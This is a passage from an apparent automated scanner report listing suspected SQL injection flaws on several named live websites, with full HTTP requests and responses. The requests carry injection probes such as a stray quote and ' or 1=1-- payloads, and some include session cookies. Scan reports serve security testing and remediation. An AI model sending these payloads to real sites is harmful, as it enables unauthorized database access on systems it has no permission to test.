Date: Sat, 26 Feb 2011 02:32:55 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:32:56 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.58. http://h.ackack.net/wp-content/themes/mystique/js/jquery.mystique.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/themes/mystique/js/jquery.mystique.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/themes'/mystique/js/jquery.mystique.js?ver=2.4.2 HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/coldfusion-mysql-xsses.html/x2258057137'%20or%201%3d1--%20
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:32:58 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:32:58 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.59. http://h.ackack.net/wp-content/themes/mystique/js/jquery.mystique.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/themes/mystique/js/jquery.mystique.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/themes/mystique'/js/jquery.mystique.js?ver=2.4.2 HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/coldfusion-mysql-xsses.html/x2258057137'%20or%201%3d1--%20
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:00 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.60. http://h.ackack.net/wp-content/themes/mystique/js/jquery.mystique.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/themes/mystique/js/jquery.mystique.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 4, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/themes/mystique/js'/jquery.mystique.js?ver=2.4.2 HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/coldfusion-mysql-xsses.html/x2258057137'%20or%201%3d1--%20
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:02 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:02 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.61. http://h.ackack.net/wp-content/themes/mystique/js/jquery.mystique.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/themes/mystique/js/jquery.mystique.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/themes/mystique/js/jquery.mystique.js'?ver=2.4.2 HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/coldfusion-mysql-xsses.html/x2258057137'%20or%201%3d1--%20
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:05 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.62. http://h.ackack.net/wp-includes/js/jquery/jquery.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-includes'/js/jquery/jquery.js?ver=1.4.4 HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/coldfusion-mysql-xsses.html/x2258057137'%20or%201%3d1--%20
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:32:53 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:32:53 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.63. http://h.ackack.net/wp-includes/js/jquery/jquery.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-includes/js'/jquery/jquery.js?ver=1.4.4 HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/coldfusion-mysql-xsses.html/x2258057137'%20or%201%3d1--%20
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:32:55 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:32:55 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.64. http://h.ackack.net/wp-includes/js/jquery/jquery.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-includes/js/jquery'/jquery.js?ver=1.4.4 HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/coldfusion-mysql-xsses.html/x2258057137'%20or%201%3d1--%20
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:32:57 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:32:59 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.65. http://h.ackack.net/wp-includes/js/jquery/jquery.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 4, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-includes/js/jquery/jquery.js'?ver=1.4.4 HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/coldfusion-mysql-xsses.html/x2258057137'%20or%201%3d1--%20
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:01 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:01 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.66. http://h.ackack.net/wp-includes/js/l10n.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-includes/js/l10n.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-includes'/js/l10n.js?ver=20101110 HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/coldfusion-mysql-xsses.html/x2258057137'%20or%201%3d1--%20
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:32:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:32:31 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.67. http://h.ackack.net/wp-includes/js/l10n.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-includes/js/l10n.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-includes/js'/l10n.js?ver=20101110 HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/coldfusion-mysql-xsses.html/x2258057137'%20or%201%3d1--%20
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:32:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:32:34 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.68. http://h.ackack.net/wp-includes/js/l10n.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-includes/js/l10n.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-includes/js/l10n.js'?ver=20101110 HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/coldfusion-mysql-xsses.html/x2258057137'%20or%201%3d1--%20
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:32:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:32:36 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.69. http://health.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://health.glam.com
Path:   /wp-content/plugins/menus-plus/javascriptmenu.php

Issue detail

The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 40966992%20or%201%3d1--%20 and 40966992%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=140966992%20or%201%3d1--%20 HTTP/1.1
Host: health.glam.com
Proxy-Connection: keep-alive
Referer: http://health.glam.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; __utmb=234602824

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Wed, 20 Apr 2011 18:37:15 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
Content-Length: 21016
X-Varnish: 303281840
Expires: Thu, 21 Apr 2011 01:37:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:37:19 GMT
Connection: close
Set-Cookie: PHPSESSID=infrjenhlpbptrlcjrbsvna431; path=/

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://fashion.glam.com/' title='Fashion' onmouseover='showSubMenu(4)' onmouseout='hideSubMenu();'>Fashion</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://trends.glam.com/' title='Trends' onmouseover='showSubMenu(5)' onmouseout='hideSubMenu();'>Trends</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://runway.glam.com/' title='Runway' onmouseover='showSubMenu(6)' onmouseout='hideSubMenu();'>Runway</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://designers.glam.com/' title='Designers' onmouseover='showSubMenu(7)' onmouseout='hideSubMenu();'>Designers</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://shopping.glam.com/' title='Shopping' onmouseover='showSubMenu(8)' onmouseout='hideSubMenu();'>Shopping</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://beauty.glam.com/' title='Beauty' onmouseover='showSubMenu(9)' onmouseout='hideSubMenu();'>Beauty</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://hair.glam.com/' title='Hair' onmouseover='showSubMenu(10)' onmouseout='hideSubMenu();'>Hair</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://makeup.glam.com/' title='Makeup' onmouseover='showSubMenu(11)' onmouseout='hideSubMenu();'>Makeup</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a 
href='http://skinbody.glam.com/' title='Skin &amp; Body' onmouseover='showSubMenu(12)' onm
...[SNIP]...

Request 2

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=140966992%20or%201%3d2--%20 HTTP/1.1
Host: health.glam.com
Proxy-Connection: keep-alive
Referer: http://health.glam.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; __utmb=234602824

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Thu, 21 Apr 2011 01:37:20 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
Content-Length: 2391
X-Varnish: 303281996
Expires: Thu, 21 Apr 2011 01:37:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:37:20 GMT
Connection: close
Set-Cookie: PHPSESSID=6fo5okrfououqo16c4b6u7j5f6; path=/

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'></ul></div> "; document.write(string);var string ="<div onmouseover='showme();' onmouseout='hideme();' class='SubNav'><div id='submenu_active' ><ul style='width:550px' class='topsubnav' id='glam-menus-plus'><li class=''><a href='http://diet.glam.com/' title='Diet &amp; Nutrition'>Diet &amp; Nutrition</a></li><li class=''><a href='http://fitness.glam.com/' title='Fitness &amp; Exercise'>Fitness &amp; Exercise</a></li><li class=''><a href='http://betahealth.glam.com/' title='Conditions &amp; Care'>Conditions &amp; Care</a></li></ul></div><style type='text/css'>._glam_search_button {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px 0; width: 55px; height: 20px;list-style:none} ._glam_search_twitter {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px -300px; width: 20px; height: 20px;} ._glam_search_facebook {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -495px; width: 20px; height: 20px;} ._glam_search_rss {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -1935px; width: 20px; height: 20px;}</style> <div class='SocialContainer'id='menusearch'><div class='SearchBox'><form role='search' name='searchform' method='get' id='searchform' action='http://www.glam.com' ><div class='search_controls'><input type='text' style='height:15px;' value='' name='search' id='search' /></div><div style='float:left;margin-top:3px;'><span onclick='javascript:document.searchform.submit();' style='cursor:pointer'><div class='_glam_search_button'></div></span></div></div> <ul class='social'> <a href='http://twitter.com/onglamfashion' target='_blank'><div class='_glam_search_twitter'></div></a> <a 
href='http://www.facebook.com/pages/Glamcom/144180538945796?ref=ts'
...[SNIP]...

1.70. http://ib.adnxs.com/seg [t parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The t parameter appears to be vulnerable to SQL injection attacks. The payloads 72427688%20or%201%3d1--%20 and 72427688%20or%201%3d2--%20 were each submitted in the t parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /seg?add=25761&t=272427688%20or%201%3d1--%20 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII3I4BEAoYCSAJKAkwsvqt7QQQsvqt7QQYCA..; uuid2=2724386019227846218; anj=Kfu=8fG5EfCxrx)0s]#%2L_'x%SEV/hnKD-GW_55dWhK/!!svq

Response 1

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
